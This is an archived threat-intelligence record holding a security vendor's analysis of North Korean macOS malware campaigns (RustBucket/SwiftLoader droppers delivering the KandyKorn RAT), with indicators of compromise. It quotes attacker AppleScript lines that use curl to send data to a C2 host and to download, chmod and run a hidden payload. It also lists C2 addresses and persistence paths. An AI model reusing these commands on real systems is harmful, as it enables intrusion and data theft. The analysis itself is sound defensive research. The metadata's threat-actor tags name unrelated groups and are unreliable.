{ "id": "d734d81f-3704-468b-ba05-ad64f4e566fa", "created_at": "2026-04-06T00:14:47.048903Z", "updated_at": "2026-04-10T13:12:47.166002Z", "deleted_at": null, "sha1_hash": "2a4321fdcddd7640c9c4c60ed54d73d030eaefe5", "title": "DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2858251, "plain_text": "DPRK Crypto Theft | macOS RustBucket Droppers Pivot to\r\nDeliver KandyKorn Payloads\r\nBy Phil Stokes\r\nPublished: 2023-11-27 · Archived: 2026-04-05 18:37:53 UTC\r\nNorth Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so\r\nfar: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed\r\n‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims\r\nviewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn\r\ncampaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange\r\nplatform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and\r\nsubsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.\r\nOur analysis of further activity in these campaigns suggests that DPRK threat actors are now ‘mixing and\r\nmatching’ components from these operations, with SwiftLoader droppers being used to deliver KandyKorn\r\npayloads. In this post, we provide an extensive review of this activity and provide further indicators to help\r\nsecurity teams defend their organizations.\r\nOverview of KandyKorn\r\nResearch by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned\r\nthreat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick\r\ntargets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 1 of 9\n\ntool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and\r\ncontained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:\r\nOverview of Operation KandyKorn\r\nStage 0\r\nA Discord user is socially engineered into downloading a malicious Python application, Cross-Platform\r\nBridges.zip . Initially, links to the malware were sent to targets via direct message with the malware hosted on\r\nGoogle drive.\r\nhttps[:]\r\nThe application’s Main.py script imports the included Watcher.py file as a module.\r\nStage 1\r\nWatcher.py checks the local Python version and downloads and executes testSpeed.py . The script downloads\r\nand executes another Python script, FinderTools . The former is deleted after execution while the latter is written\r\nto /Users/Shared/FinderTools .\r\nStage 2\r\nFinderTools downloads and executes a Mach-O binary, dubbed SUGARLOADER, at /Users/Shared/.sld .\r\nThe same file is also copied twice as .log and as appname , both within the Discord application’s hierarchy at\r\n/Applications/Discord.app/Contents/MacOS/ .\r\nWritten in C++, SUGARLOADER checks for the existence of a configuration file at\r\n/Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is\r\nhardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on\r\nthe command line.\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 2 of 9\n\nIn the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz .\r\ntp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC\r\nStage 3\r\nSUGARLOADER also downloads a Mach-O payload dubbed HLOADER and writes it to\r\n/Applications/Discord.app/Contents/MacOS/Discord . The genuine Discord executable is renamed as .lock in\r\nthe same directory.\r\nHLOADER\r\nAfter this replacement, when Discord is launched, HLOADER renames itself to MacOS.tmp , renames the .lock\r\nfile back to Discord , and executes both the genuine Discord binary and the SUGARLOADER executable\r\nsaved as .log . This causes the entire renaming/reloading process to repeat.\r\nOn the assumption that the victim is likely to launch Discord frequently, the purpose of HLOADER is to provide a\r\npersistence mechanism that will not be detected by Apple’s monitoring of background login items.\r\nStage 4\r\nSUGARLOADER retrieves a C2 URL from the configuration file previously stored at com.apple.safari.ck . In\r\nthe observed intrusion, this was 23.254.226[.]90 , communicating over TCP port 44.\r\nSUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via\r\nNSCreateObjectFileImageFromMemory and NSLinkModule . This technique has been used previously in North\r\nKorean macOS malware, starting with UnionCryptoTrader back in 2019.\r\nBuilding off Elastic’s research, we identified a number of other versions of KANDYKORN RAT, with the\r\nfollowing SHA1s:\r\nSHA1 First Seen\r\n62267b88fa6393bc1f1eeb778e4da6b564b7011e Apr 2023\r\n8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18 Apr 2023\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 3 of 9\n\nac336c5082c2606ab8c3fb023949dfc0db2064d5 Apr 2023\r\n26ec4630b4d1116e131c8e2002e9a3ec7494a5cf Aug 2023\r\n46ac6dc34fc164525e6f7886c8ed5a79654f3fd3 Aug 2023\r\n8d5d214c490eae8f61325839fcc17277e514301e Aug 2023\r\n9f97edbc1454ef66d6095f979502d17067215a9d Aug 2023\r\nc45f514a252632cb3851fe45bed34b175370d594 Aug 2023\r\nce3705baf097cd95f8f696f330372dd00996d29a Aug 2023\r\ne244ff1d8e66558a443610200476f98f653b8519 Aug 2023\r\ne77270ac0ea05496dd5a2fbccba3e24eb9b863d9 Aug 2023\r\ne68bfa72a4b4289a4cc688e81f9282b1f78ebc1f Nov 2023\r\nInteresting among these is 26ec4630b4d1116e131c8e2002e9a3ec7494a5cf , which is written to\r\n/Users/Shared/.pld , a point we will return to below.\r\nRecent RustBucket activity\r\nIn what at first sight appears to be an entirely different campaign, North Korean threat actors have an ongoing and\r\nevolving campaign first disclosed by JAMF dubbed RustBucket. This campaign initially involved a first stage\r\nAppleScript applet and a Swift-based application bundle called ‘Internal PDF Viewer.app’, which used specially\r\ncrafted PDFs to unlock code for downloading a Rust-based payload.\r\n#Lazarus #APT\r\nLooks like the target is Apple developers.\r\n8a8de435d71cb0b0ae6d4b15d58b7c85ce3ef8f06b24266c52b2bc49217be257https://t.co/aXVCAFpVP4\r\n— 2ero (@BaoshengbinCumt) November 10, 2023\r\nA number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based\r\nstager, collectively dubbed SwiftLoader, have come to light over the last few months.\r\nWhile some of these continued to be distributed with the name “InternalPDF Viewer”, in June researchers spotted\r\na variant called SecurePDF Viewer.app . This application was signed and notarized by Apple (since revoked) by a\r\ndeveloper with the name “BBQ BAZAAR PRIVATE LIMITED (7L2UQTVP6F)”. SecurePDF Viewer.app\r\nrequires at least macOS 12.6 (Monterey), and has the bundle identifier com.softwaredev.swift-ui-test . It is\r\ncapable of running on both Intel and Apple silicon devices.\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 4 of 9\n\nThe main executable uses curl to reach out to docs-send.online/getBalance/usdt/ethereum . This retrieves a\r\nfile called /gatewindow/1027/shared/ (c806c7006950dea6c20d3d2800fe46d9350266b6) , an AppleScript script that\r\nwhen executed posts the filepath of the executing process to a remote server hosted on swissborg.blog .\r\nset sdf to (POSIX path of (path to me))\r\nset aaas to do shell script \"curl -H \\\"Content-Type:application/json\\\" -d '{\\\"zip\\\":\\\"\"\r\n\"\\\"}' https[:]//swissborg[.]blog/tx/10299301992/hash\"\r\nrun script aaas\r\nConnection to ObjCShellz\r\nThe swissborg.blog domain contacted by SecurePDF Viewer was previously mentioned by JAMF in an article\r\nin early November.\r\nJAMF researchers described what appeared to them as a late stage RustBucket payload distributed as a Mach-O\r\nbinary called ProcessRequest . The researchers dubbed the malware ObjCShellz, in light of the fact that the code\r\nwas written in Objective-C and functions to execute simple shell commands from a remote C2 via the system()\r\nfunction invoking sh -c .\r\nOur research shows that ObjCShellz is highly likely a later stage of the SwiftLoader SecurePDF Viewer.app .\r\nSwiftLoader Connection to KandyKorn RAT\r\nOther versions of SwiftLoader have been spotted in the wild, including one distributed in a lure called Crypto-assets and their risks for financial stability[.]app[.]zip .\r\nThis application is also signed and notarized by Apple (since revoked) by a developer with the name “Northwest\r\nTech-Con Systems Ltd (2C4CB2P247)”. The bundle identifier is com.EdoneViewer and the app’s main\r\nexecutable is EdoneViewer .\r\nThere are some interesting overlaps between this version of SwiftLoader and the KandyKorn operation.\r\nOur analysis of EdoneViewer shows it contains a hardcoded URL encoded with a single-byte XOR key of Ox40 .\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 5 of 9\n\nOnce decoded, we can see the malware reaches out to the domain on-global.xyz and drops a hidden executable\r\nat /Users/Shared/.pw .\r\nD%3D\", \"http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D\",\r\n\"/users/shared/Crypto-assets and their risks for financial stability.pdf\", \"/users/shared/.pw\"}\r\ndo shell script \"curl -o \\\"\" \u0026 p \u0026 \"\\\" \" \u0026 d \u0026 a \u0026 \"\u0026\u0026 open \\\"\" \u0026 p \u0026 \"\\\"\" \u0026 \"\u0026\u0026\r\ncurl -o \" \u0026 b \u0026 \" \" \u0026 s \u0026 a \u0026 \" -d pw\" \u0026 \"\u0026\u0026 chmod 770 \" \u0026 b \u0026 \"\u0026\u0026\r\n/bin/zsh -c \\\"\" \u0026 b \u0026 \" \" \u0026 s \u0026 \" \u0026\\\" \u0026\u003e /dev/null\"\r\nWe note that the KandyKorn Python script FinderTools reached out for its next stage to malware hosted on the\r\ndomain tp.globa.xyz and that SUGARLOADER dropped hidden files at /Users/Shared/.sld .\r\nThe .pw executable, named download.bin on VirusTotal ( 060a5d189ccf3fc32a758f1e218f814f6ce81744 ),\r\ntakes the URL hardcoded in the EdoneViewer binary as a launch argument. Unfortunately, the C2 did not respond\r\nwith a download on our test, but the file contains a hardcoded reference to /Users/Shared/.pld .\r\nRecall that we discovered a variant of KANDYKORN RAT with the same file name .pld above\r\n(26ec4630b4d1116e131c8e2002e9a3ec7494a5cf). We assess with medium confidence that /Users/Shared/.pld\r\nrefers to the same .pld KandyKorn RAT given the overlaps in infrastructure, objectives and TTPs noted here\r\nand by previously mentioned researchers.\r\nSentinelOne Customers Protected from KandyKorn and RustBucket Malware\r\nSentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket\r\nmalware.\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 6 of 9\n\nConclusion\r\nOur analysis has established new connections between previous research findings. We note specific shared\r\ninfrastructure that indicates a link between ObjCShellz payloads and SwiftLoader stagers. We also provide the\r\nfirst clues that RustBucket droppers and KandyKorn payloads are likely being shared as part of the same infection\r\nchain.\r\nOur analysis corroborates findings from other researchers that North Korean-linked threat actors’ tendency to\r\nreuse shared infrastrucutre affords us the opportunity to widen our understanding of their activity and discover\r\nfresh indicators of compromise. Below we provide a list of indicators we observed and analyzed in this research.\r\nIndicators of Compromise\r\nSUGARLOADER\r\nd28830d87fc71091f003818ef08ff0b723b3f358\r\nHLOADER\r\n43f987c15ae67b1183c4c442dc3b784faf2df090\r\nKANDYKORN RAT\r\n26ec4630b4d1116e131c8e2002e9a3ec7494a5cf\r\n46ac6dc34fc164525e6f7886c8ed5a79654f3fd3\r\n62267b88fa6393bc1f1eeb778e4da6b564b7011e\r\n8d5d214c490eae8f61325839fcc17277e514301e\r\n8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18\r\n9f97edbc1454ef66d6095f979502d17067215a9d\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 7 of 9\n\nac336c5082c2606ab8c3fb023949dfc0db2064d5\r\nc45f514a252632cb3851fe45bed34b175370d594\r\nce3705baf097cd95f8f696f330372dd00996d29a\r\ne244ff1d8e66558a443610200476f98f653b8519\r\ne68bfa72a4b4289a4cc688e81f9282b1f78ebc1f\r\ne77270ac0ea05496dd5a2fbccba3e24eb9b863d9\r\nObjCShell\r\n79337ccda23c67f8cfd9f43a6d3cf05fd01d1588\r\nSecurePDF Viewer\r\na1a8a855f64a6b530f5116a3785a693d78ec09c0\r\ne275deb68cdff336cb4175819a09dbaf0e1b68f6\r\nCrypto-assets and their risks for financial stability.app\r\n09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036\r\n5c93052713f317431bf232a2894658a3a4ebfad9\r\n884cebf1ad0e65f4da60c04bc31f62f796f90d79\r\nbe903ded39cbc8332cefd9ebbe7a66d95e9d6522\r\nDownloader\r\n060a5d189ccf3fc32a758f1e218f814f6ce81744\r\nRemotely-hosted AppleScript\r\n3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c\r\nc806c7006950dea6c20d3d2800fe46d9350266b6\r\nNetwork Communications\r\nhttp[:]\r\nhttps[:]\r\nhttp[:]\r\nhttp[:]\r\nhttp[:]\r\n23.254.226[.]90\r\n104.168.214[.]151\r\n142.11.209[.]144\r\n192.119.64[.]43\r\nFile paths\r\n/Applications/Discord.app/Contents/MacOS/.log\r\n/Applications/Discord.app/Contents/MacOS/appname\r\n/Library/Caches/com.apple.safari.ck\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 8 of 9\n\n/tmp/tempXXXXXX\r\n/Users/Shared/.pld\r\n/Users/Shared/.pw\r\n/Users/Shared/.sld\r\nSource: https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/" ], "report_names": [ "dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads" ], "threat_actors": [ { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "cfdd35af-bd12-4c03-8737-08fca638346d", "created_at": "2022-10-25T16:07:24.165595Z", "updated_at": "2026-04-10T02:00:04.887031Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Cosmic Wolf", "Marbled Dust", "Silicon", "Teal Kurma", "UNC1326" ], "source_name": "ETDA:Sea Turtle", "tools": [ "Drupalgeddon" ], "source_id": "ETDA", "reports": null }, { "id": "33ae2a40-02cd-4dba-8461-d0a50e75578b", "created_at": "2023-01-06T13:46:38.947314Z", "updated_at": "2026-04-10T02:00:03.155091Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "UNC1326", "COSMIC WOLF", "Marbled Dust", "SILICON", "Teal Kurma" ], "source_name": "MISPGALAXY:Sea Turtle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "62b1b01f-168d-42db-afa1-29d794abc25f", "created_at": "2025-04-23T02:00:55.22426Z", "updated_at": "2026-04-10T02:00:05.358041Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON" ], "source_name": "MITRE:Sea Turtle", "tools": [ "SnappyTCP" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434487, "ts_updated_at": 1775826767, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.pdf", "text": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.txt", "img": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.jpg" } }